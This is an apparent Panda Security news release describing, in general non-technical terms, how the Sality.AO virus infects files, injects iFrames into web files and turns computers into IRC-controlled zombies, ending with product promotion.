Malware goes retro with the spread of the Sality.AO virus


Panda Security’s malware detection and analysis laboratory has noted an increase in the number of infections caused by Sality.AO, a virus that combines the features of traditional viruses (infecting files and damaging as many computers as possible to achieve notoriety for creators) with the objectives of new malware, i.e. generating financial returns for cyber-criminals. The global security vendor is therefore advising users to be on their guard against a potentially massive attack.

“Sality.AO uses some techniques which haven’t been seen for years, such as EPO or Cavity,” says Jeremy Matthews, the head of Panda Security’s sub-Saharan operations. “These techniques relate to the way in which the original file is modified in order to infect it, making it more difficult to detect these changes and to disinfect it. EPO allows part of a legitimate file to be run before infection starts, making it difficult to detect the malware while Cavity involves inserting the virus code in blank spaces within the legitimate file’s code, making it both more difficult to locate and to disinfect infected files.”

Matthews says that these techniques are far more complex than those that can be achieved with automatic malware creation tools, which have been responsible for much of the increase in the number of threats in circulation recently. They require much greater skill and knowledge of malicious code programming.

In addition to these techniques related with early malware, Sality.AO includes a series of features associated with new malware trends, such as the possibility to connect to IRC channels to receive remote commands, which could potentially turn the infected computer into a zombie. Such zombie computers can be used for sending spam, distributing malware and denial of service attacks.

Similarly, infections are not just restricted to files, as was the case with old viruses, but also look to propagate across the Internet, in line with new trends. To this end, it uses an iFrame to infect PHP, ASP and .HTML files on the computer. The result is that when any of these files are run the browser is redirected, without the user’s knowledge, to a malicious page that launches an exploit against a computer in order to download more malware.

If any of the infected files are posted on a webpage – bearing in mind these file types are typically uploaded to the Web – any users downloading the files or visiting the webpages will become infected.

The file downloaded through this technique is regarded by Panda as “hybrid malware” as it combines the functions of Trojans and viruses. The Trojan, in addition, has downloader features for downloading other strains of malware to the computer. The URLs used by this downloader were still not operative at the time of the Panda’s analysis, but they could become active as the number of infected computers increases.

“As we forecast in the annual PandaLabs report, the distribution of classic malicious code such as viruses will be a major trend in 2009. The use of increasingly sophisticated detection technologies like Panda Security’s Collective Intelligence, capable of detecting even low-level attacks and the newest malware techniques, will make cyber-crooks return to old codes, adapted to new needs. This means they won’t be viruses designed simply to spread or damage computers, as they were 10 years ago, but will be designed, such as in this case, to hide Trojans or turn computers into zombies,” concludes Matthews.